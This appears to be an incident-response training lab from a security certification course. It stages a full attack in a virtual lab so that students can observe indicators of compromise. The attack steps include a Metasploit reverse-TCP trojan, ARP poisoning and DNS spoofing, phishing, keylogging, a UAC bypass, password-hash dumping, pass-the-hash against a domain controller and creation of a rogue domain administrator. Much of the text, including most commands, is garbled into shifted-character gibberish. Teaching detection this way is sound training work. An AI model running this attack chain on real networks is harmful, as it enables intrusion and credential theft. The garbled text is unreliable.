Lab Activity:

Observing IoCs during a Security

Incident

EXAM OBJECTIVES COVERED Show Slide(s)

4.2 Given a scenario, apply the appropriate incident response procedure.
*LYHQDQLQFLGHQWDQDO\]HSRWHQWLDOLQGLFDWRUVRIFRPSURPLVH 2EVHUYLQJΖR&V'XULQJD
6HFXULW\ΖQFLGHQW

Scenario Teaching
Tip
In this lab, we will simulate an incident response scenario. While not genuinely
<RXFDQVNLS3&DQG
adversarial—you'll be operating both the blue and red teams—it will hopefully DOORFDWHPRUH5$0WR
demonstrate the "fog of war." DQRWKHUPDFKLQHLI
\RXSUHIHU3&LVQRW
The red team has gained two valuable assets through social engineering. It has been
actively used in the
able to attach a rogue device to the internal network by gaining access to the company lab—it is just there to
premises as a temporary worker and is aware that the company 515support has just appear as another host
taken on a new employee in its IT department: "Bobby Admin." in scans.

Lab Setup
If you are completing this lab using the CompTIA Labs hosted environment, access the
lab using the link provided. Note that you should follow the instructions presented in
the CompTIA Labs interface, NOT the steps below. If you are completing this lab using
DFODVVURRPFRPSXWHUXVHWKH90VLQVWDOOHGWR+\SHU9RQ\RXU+267FRPSXWHUDQG
follow the steps below to complete the lab.
6WDUWWKH90VXVHGLQWKLVODELQWKHIROORZLQJRUGHUDGMXVWLQJWKHPHPRU\DOORFDWLRQ
ȴUVWLIQHFHVVDU\DQGZDLWLQJDWWKHHOOLSVLVIRUWKHSUHYLRXV90VWRȴQLVKERRWLQJ
EHIRUHVWDUWLQJWKHQH[WJURXS<RXGRQRWQHHGWRFRQQHFWWRD90XQWLOSURPSWHGWR
do so in the activity steps.
870ȃ0%
2. DC1 (1024—2048 MB)
...
3. MS1 (1024—2048 MB)
...
37ȃ0%
5. PC1 (1024—2048 MB)

ΖI\RXFDQDOORFDWHPRUHWKDQWKHPLQLPXPDPRXQWVRI5$0SULRULWL]H37DQG3&

Lesson 6: Applying Incident Response Procedures_7RSLF&

 Bobby's First Day
$V%REE\VLWVGRZQWRZRUNIRUKLVȴUVWGD\WRVHWXSKLVFRPSXWHUDVLQVWUXFWHGKH
gets a phone call.
1. Open a connection window for the PC190DQGORJRQZLWKWKHXVHUQDPHbobby
and password Pa$$w0rd.

2. Open a command prompt as administrator and execute the following command

to install the Sysmon driver (ignore any line breaks):

F?ODEƴOHV?V\VLQWHUQDOV?V\VPRQH[HLF?ODEƴOHV?
V\VLQWHUQDOV?V\VPRQFRQƴJH[SRUW[POQDFFHSWHXOD
3. Close the command prompt window.

4. 6WDUW7KXQGHUELUGDQGFRQȴJXUHWKHDFFRXQWIRUEREE\#VXSSRUWFRP
with password Pa$$w0rd.

A cell phone call comes from the senior security analyst: "Bobby, can you open
Wireshark and start recording . . .?"

5. 8VHWKHGHVNWRSVKRUWFXWWRRSHQ:LUHVKDUN6WDUWDFDSWXUHRQWKH(WKHUQHW
LQWHUIDFHXVLQJWKHFDSWXUHȴOWHULSWRȴOWHURXWΖ3YWUDɝF

:HGRQ
WKDYHD6Ζ(0VHWXSLQWKLVODEVRZH
OOKDYHWRDVVXPHWKDWWKHFRPSDQ\LVRQKLJK
DOHUWDQGDGYLVLQJDGPLQVWD΍WRWDNHH[WUHPHPHDVXUHVWRPRQLWRUIRUΖR&VRUSHUKDSV
VRPHWKLQJHOVHLVJRLQJRQ

Teaching The Red Team Starts Their Attack Run

Tip
The red team pentester ("Mal") has gained access to the premises and attached a laptop
PT1 gets allocated
WKLVΖ3DGGUHVVIURP to a wall port. As Mal, you need to establish what is on the local network with you.
a reservation on the 1. ΖQ+\SHU90DQDJHUULJKWFOLFNWKHPT190DQGVHOHFWSettings.
'+&3VHUYHUUXQQLQJ
RQ067KLVLVQRW 2. Select the Network Adapter node. In the right-hand pane, under 9LUWXDOVZLWFK,
very realistic for the
scenario, but enables
select vLOCAL. Click OK.
XVWRVNLSVRPHWHGLRXV
FRQȴJXUDWLRQVWHSV
3. Open a connection window for the PT190DQGORJRQZLWKWKHXVHUQDPHURRW
and password Pa$$w0rd.

4. Open a terminal and run LIFRQƴJ

5. ΖQWKHLIFRQȴJRXWSXWFKHFNWKDWWKHΖ3DGGUHVVLVΖILWLVQRWUXQ
GKFOLHQW to refresh the lease.
6. Run the following commands to start the database, email, and web servers you
will use during the attack, and launch the Metasploit Framework.

VHUYLFHSRVWJUHVTOVWDUW
VHUYLFHSRVWƴ[VWDUW
VHUYLFHDSDFKHVWDUW
PVIFRQVROH
7. At the PVI prompt, execute the following scan (ignore the line break and run as
one command):

GEBQPDS7$'

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
8. Switch to PC1. Perform some ordinary network operations, such as sending an
email to [email protected] or to yourself, browsing the intranet at http://
FRUSVXSSRUWFRPRUFKHFNLQJWKHȴOHVKDUHDW??'&?ODEȴOHV

9. Observe the Wireshark output for a minute, using the summary and analysis tools
as well as watching the frame-by-frame output. Is it easy to discern whether a
scan is ongoing? What is the attack machine's MAC address?

<RXZLOOVHHDORWRI$53DQG6<1RQO\WUDɝFIURP'&$$ZKLFKLV
the MAC address you're looking for. This timing template is not that sneaky, and
WKHGHFR\Ζ3DGGUHVVHVDUHQRWH΍HFWLYHZKHQWKH\DUHLQVXFKFORVHSUR[LPLW\
7 or less would take a lot longer to detect. Look at the Statistics > Endpoints
tool and compare the number of packets to number of bytes. The ratio will be low
for 00-15-5D-01-CA-4A (around 60 bytes per packet) compared to typical usage
(maybe 400 bytes per packet, depending on how enthusiastically you simulated
normal network activity).

10. Stop the packet capture.

11. Bobby wonders what to do. It is obvious that someone is performing a scan on
the network. Is this part of the usual IT vulnerability/threat monitoring, or is it an
incident? He's not sure of the addressing scheme in place but thinks that .100s
are used for workstations—that's the range his machine is in after all. What
incident response or basic security policies or security technologies could make
Bobby's job easier at this point?

%REE\VKRXOGEHJLYHQWUDLQLQJVSHFLȴFWRWKHQHWZRUNV\VWHPVDQGSURFHGXUHV
He might be assisted by an IDS that would trigger an alert when scanning activity
is detected from an unauthorized IP. An incident response "playbook" would
identify this sort of scenario and provide guidance about next steps.

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
 Teaching Set Up a Phishing Site
Tip
Mal—the red team attacker—is getting worried. S/he has tried to use a slow scan to
3&PLJKWEHUHSRUWHG
DV:LQGRZV;3 be stealthy, but the rogue laptop device could be discovered at any moment. Faster
results are required.
1. Switch back to the PT190$WWKHPVI prompt, press &75/+C to cancel the
current scan if it has not completed, and run the following command:

GEBQPDS$
2. When the scan has completed, run KRVWV to view a summary of the hosts
detected by the scan.

3. 0DNHDQRWHRIWKHΖ3DGGUHVVRIWKH3&90ȃ%REE\
VPDFKLQH

Mal has a tried and trusted exploit vector in mind, but it has to be recompiled for
use on the local subnet.

4. At the msf5 prompt, run the following commands:

UPURRW'RZQORDGVHYLOSXWW\H[H
PVIYHQRPSZLQGRZVPHWHUSUHWHUUHYHUVHBWFS
OKRVW OSRUW [URRW'RZQORDGV
SXWW\H[HNIH[HRHYLOSXWW\H[H
FSHYLOSXWW\H[HYDUZZZKWPO
XVHH[SORLWPXOWLKDQGOHU
VHWSD\ORDGZLQGRZVPHWHUSUHWHUUHYHUVHBWFS
VHWOKRVW
VHWOSRUW
H[SORLW

Run the Phishing Exploit

To try to compromise a host, we'll send a phishing email to the target persuading them
to run some software from the corporate intranet. We will leverage our access to the
ORFDOVHJPHQWWRDWWHPSWWRXVHVSRRȴQJWRUHVROYHWKLVKRVWQDPHRIWKHLQWUDQHW
server to the IP of the attack machine, which will serve the reverse TCP Trojan.
1. 6WLOORQWKH3790UXQWKHIROORZLQJFRPPDQGLQDQHZWHUPLQDO

QDQRHWFHWWHUFDSHWWHUGQV
2. $GGWKHIROORZLQJOLQHVWRWKHHQGRIWKHȴOHWKHQVDYH&75/+O) and close
(&75/+X) it:

VXSSRUWFRP$
VXSSRUWFRP$
XSGDWHVXSSRUWFRP375
3. Run HWWHUFDS*

4. Click the 6QLɝQJDWVWDUWXSWRJJOHWRWXUQLWR΍DQGFOLFNWKHTick button in the

toolbar.

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
5. Select the menu ellipse and then Hosts > Scan for hosts. When complete, select
Hosts > Hosts list.

6. Select 10.1.0.1 and click Add to Target 1, then select 10.1.0.10x (where x
completes the DHCP-assigned IP of PC1) and click Add to Target 2.

7. Select Plugins > Manage plugins and double-click GQVBVSRRI to activate it.

8. Select the Globe icon (MITM) and then select Arp Poisoning. In the dialog, check
the 6QL΍UHPRWHFRQQHFWLRQV box and click OK.

9. Click the PlayLFRQEXWWRQWRVWDUWVQLɝQJ

10. 8VHWKHGHVNWRSLFRQWRVWDUW7KXQGHUELUGΖQWKHGLDORJVHOHFWdefault and click

Start Thunderbird.

11. In the main Thunderbird window, right-click the defaultSURȴOHDQGVHOHFW

Settings.

12. Change <RXUQDPH to $GPLQLVWUDWRU and the (PDLODGGUHVV to

DGPLQLVWUDWRU#VXSSSRUWFRP, then click OK.

0DNHVXUH\RXXVHWKHW\SRVSRRIHGGRPDLQSDUWZLWKWKUHH3V'RQRWXVHDW\SRVSRRIHG

GRPDLQIRUWKHOLQNEHORZWKRXJK

13. Compose a message to EREE\#VXSSRUWFRP purporting to be from

WKHORFDOQHWZRUNDGPLQLVWUDWRUDGYLVLQJLQVWDOODWLRQRIWKHȴOHRQWKHFRUSRUDWH
intranet to help deal with the ongoing incident. Make the text "corporate intranet"
a hyperlink to KWWSXSGDWHVXSSRUWFRP. Send the message.

14. Close Thunderbird.

Play Along
Bobby's been told to stay alert, so he logs an incident. A few moments later the
VXSHUYLVRUFDOOVWRDGYLVHNHHSLQJHYHU\WKLQJR΍JULG$QLQWUXVLRQLVFRQȴUPHGEXW
the attacker's level of access cannot be determined. The team is switching to out-of-
band communications channels.
Moments later, the senior security analyst is on the phone again: "Bobby, we have the
LQWUXGHUFRQWDLQHG/HW
VVHHKRZWKLVSOD\VRXW)ROORZWKHOLQNEXWPRQLWRUWUDɝF
coming into your machine on Wireshark."
1. Switch to the PC190DQGUHVWDUWWKH:LUHVKDUNFDSWXUHZLWKWKHVDPHLS
FDSWXUHȴOWHU

2. 9LHZWKHHPDLOLQ7KXQGHUELUG:RXOGWKHLPSHUVRQDWHGVHQGHUDGGUHVVEH
convincing if you weren't looking for it?

3. Click the link to open the site in the browser.

4. 6FUROOGRZQWKHSDJHDQGWKHQFOLFNWKHOLQNDQGVDYHWKHHYLOSXWW\H[HȴOHWR
Downloads, but do not run it. Leave the prompt "Finished downloading" on the
screen.

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
 5. Switch to Wireshark and stop the capture. Locate the DNS query—it will be just
before the big block of green HTTP packets. What is the IP address of the server,
and what is its MAC address?

The IP address is 10.1.0.1, but that MAC address of 00-15-5D-01-CA-4A looks familiar
too.

6. On the PT190QRWHWKH'16UHVSRQVHVWKDW(WWHUFDSLVVSRRȴQJ

7. In Ettercap select Mitm (Globe icon) > Stop Mitm attack(s). Click OK.

8. Close Ettercap.

Navigate the OODA Loop

What the attacker doesn't realize in this scenario is that he has been enticed into a
honeypot, and the "Blue Team" are setting up resources to monitor the attack as it
happens.
As you complete this part of the lab, think about the OODA loop—Observe, Orient,
Decide, Act. Think about how each team should adjust tactics based on what is known.
1. 6ZLWFKWRWKH3&906WDUWDQHZSDFNHWFDSWXUHZLWKWKHVDPHLSFDSWXUHȴOWHU

2. Run F?ODEƴOHV?V\VLQWHUQDOV?SURFH[SH[H$FFHSWWKH(8/$

3. Switch back to the browser and from the prompt "Finished downloading," click
the Run button. Click Run at the SmartScreen prompt.

4. Select Process Explorer again. Add the User Name and Integrity LevelȴHOGV
Note that the malware has been started as a child process of the browser.

5. Right-click the evilputty.exe process and select Properties. Select the TCP/IP
tab. Note that the process has opened a network connection. Click OK.

6. Acting on instinct, take a look at the properties of the onedrive.exe, paying

particular attention to private bytes, threads, strings, and network connections (if
any). You do not have to write everything down—just try to get an impression of
what the process is using currently.

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
7. ΖISRVVLEOHDUUDQJHWKH90ZLQGRZVVRWKDW\RXFDQYLHZERWK37DQG3&DWWKH
VDPHWLPHVRDVWRNHHSDQH\HRQ3URFHVV([SORUHUb

8. Make a note of the local system time on PC1 to help you to correlate the following
intrusion activity to logged events at the end of the lab.

Observe and Orient

We will move the listener from the fairly obtrusive evilputty.exe to a less noticeable
program. Looking through the list, onedrive.exe is quite a good choice as it is not
usually closed down by the user and would not attract so much attention if shown to
be connecting with the network, though the endpoints and possibly ports are always
going to be suspicious.
1. Assume the role of Mal again and switch to the PT1901RWHWKDW0HWHUSUHWHU
has started the handler and opened a prompt.

2. Run the following commands:

JHWXLG
SV
Note that the attacker can see that Wireshark is running a packet capture.
Proceeding at this point may be a little foolhardy.

3. Make a note of the PID of onedrive.exe (5704 in the example above), then run the
following commands, substituting SLG for the actual value:

PLJUDWHSLG
NH\VFDQBVWDUW
The second command starts to monitor keystrokes on the target.

4. On PC1, observe what happens. Check the properties of onedrive.exe for

changes.

5. On PC1, open a command prompt and run the following command:

QHWVWDWERQS7&3
6. Curse your forgetfulness, open an administrative prompt, and run the same
command. Note that the original evilputty PID is listed as the process connected
WR

7. Back on PT1, run NH\VFDQBGXPS to check what the user has been doing.

1RWHWKDWWKHNH\VIURPWKHȴUVWFRPPDQGSURPSWDUHFDSWXUHGEXWQRWZKDW
you typed into the administrative prompt. The current malicious process has
a medium integrity level and cannot communicate with the high-integrity cmd
process. Better privileges are required.

Decide and Act

As Mal, you decide that this network seems so wide open it would be foolish not to
proceed.
1. 6ZLWFKWRWKH37905XQWKHIROORZLQJFRPPDQGLQ0HWHUSUHWHU

JHWV\VWHP
7KLVZLOOIDLODVWKHFXUUHQWDFFRXQWGRHVQRWKDYHVXɝFLHQWSULYLOHJHV

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
 2. Run the following commands to try another exploit module.

EDFNJURXQG
XVHZLQGRZVORFDOE\SDVVXDFBFRPKLMDFN
VHWSD\ORDGZLQGRZV[PHWHUSUHWHUUHYHUVHBWFS
VHWOKRVW
VHWOSRUW
VKRZVHVVLRQV
VHWVHVVLRQ
H[SORLW
If it doesn't work, try running H[SORLW again.

3. If the exploit succeeds, run the following two commands to get system privileges,
and dump the local password hash store:

JHWV\VWHP
KDVKGXPS
4. Click-and-drag to select the string between  and ::. Right-click the selection
and select Copy.

5. Run the following commands to use the captured hash in a psexec attack against
the network's Domain Controller:

EDFNJURXQG
EDFN
XVHH[SORLWZLQGRZVVPESVH[HF
VHWUKRVW
VHWSD\ORDGZLQGRZV[PHWHUSUHWHUUHYHUVHBWFS
VHWOKRVW
VHWOSRUW
VHWVPEGRPDLQVXSSRUW
VHWVPEXVHUDGPLQLVWUDWRU
6. Type VHWVPESDVV, right-click and select Paste selection, and then press
(17(5.
7. Type H[SORLW and press (17(5.

8. You should now have a Meterpreter shell on the DC. Run the following commands
to exploit this fact:

JHWXLG
KDVKGXPS
VKHOO

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
 QHWXVHUDGPLLQ3DZUGDGGGRPDLQ
QHWJURXS'RPDLQ$GPLQVDGPLLQDGGGRPDLQ
A wide grin spreads across Mal's face, but then a shadow falls across the laptop
VFUHHQDQGDȴUPKDQGJULSVDVKRXOGHU9HU\FRPSHWHQWH΍RUWDWEUHDNLQJLQWRRXU
honeypot."

Lessons-Learned Report
Review some of the evidence you have collected as the attack was allowed to progress.
1. Stop the Wireshark capture. Can you learn anything about the attack from the
packet contents, other than the endpoints and ports used? Close Wireshark when
\RXKDYHȴQLVKHG

1RWKHWUDɝFLVHQFU\SWHG

2. Right-click Start and select Event Viewer. Expand Applications and Services
Logs > Microsoft > Windows > Sysmon > Operational.

3. Note the following events:

a) ProcessCreate and Network connection events when evilputty.exe was

launched.

b) A CreateRemoteThread event when the Meterpreter shell was migrated to

the onedrive.exe process (attack.mitre.org/techniques/T1055).

c) A sequence of Process Create events where the user legitimately executed a

command prompt as administrator, prompting the consent.exe process to
SHUIRUP8$&

d) A Registry value set event followed by Process Create events where the
%\SDVV8$&E\&20KLMDFNLQJattack.mitre.org/techniques/T1088).

e) Registry value set events followed by Process Create events where the
*(76<67(0VFULSWH[SORLWVQDPHGSLSHVFPGH[HFHFKR\OVFYO!???SLSH?
ylscvl) to obtain system-level privileges.

4. Optionally, log on to DC1 and observe the Security log. Note event 4776
&UHGHQWLDO9DOLGDWLRQ7KLVDSSHDUVZKHQDQDFFRXQWLVYDOLGDWHGE\17/0UDWKHU
than Kereberos. Note the generic "WORKSTATION" host name. The details for
the subsequent 4672 (Special privileges assigned to log-on) and 4624 (Log-on)
events also show log-on type 3 (network) and the use of the NTLM authentication
package. You may want to compare these to earlier valid Kerberos log-on events.
The null SID ones are due to the guest account being enabled on the domain.

5. Subsequent events (principally 4720 and 4728) show the user account creation
DQGJURXSPRGLȴFDWLRQDFWLYLW\

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&
 2EVHUYLQJWKHXVHRISDVVWKHKDVKYLDHYHQWORJVRQWKHGRPDLQFRQWUROOHU1RWHWKDWWKHDFFRXQWLV
DXWKHQWLFDWHGE\17/0QRW.HUEHURVDQGWKDWDSODFHKROGHUFRPSXWHUQDPHLVXVHG6FUHHQVKRW
XVHGE\SHUPLVVLRQIURP0LFURVRIW

Close the Lab

'LVFDUGFKDQJHVPDGHWRWKH90VLQWKLVODE
• 6ZLWFKWRWKH+\SHU90DQDJHUFRQVROHRQWKH+267

• )RUHDFK90WKDWLVUXQQLQJULJKWFOLFNDQGVHOHFWRevertWRVHWWKHFRQȴJXUDWLRQ
back to the saved checkpoint.

/HVVRQ$SSO\LQJΖQFLGHQW5HVSRQVH3URFHGXUHV_7RSLF&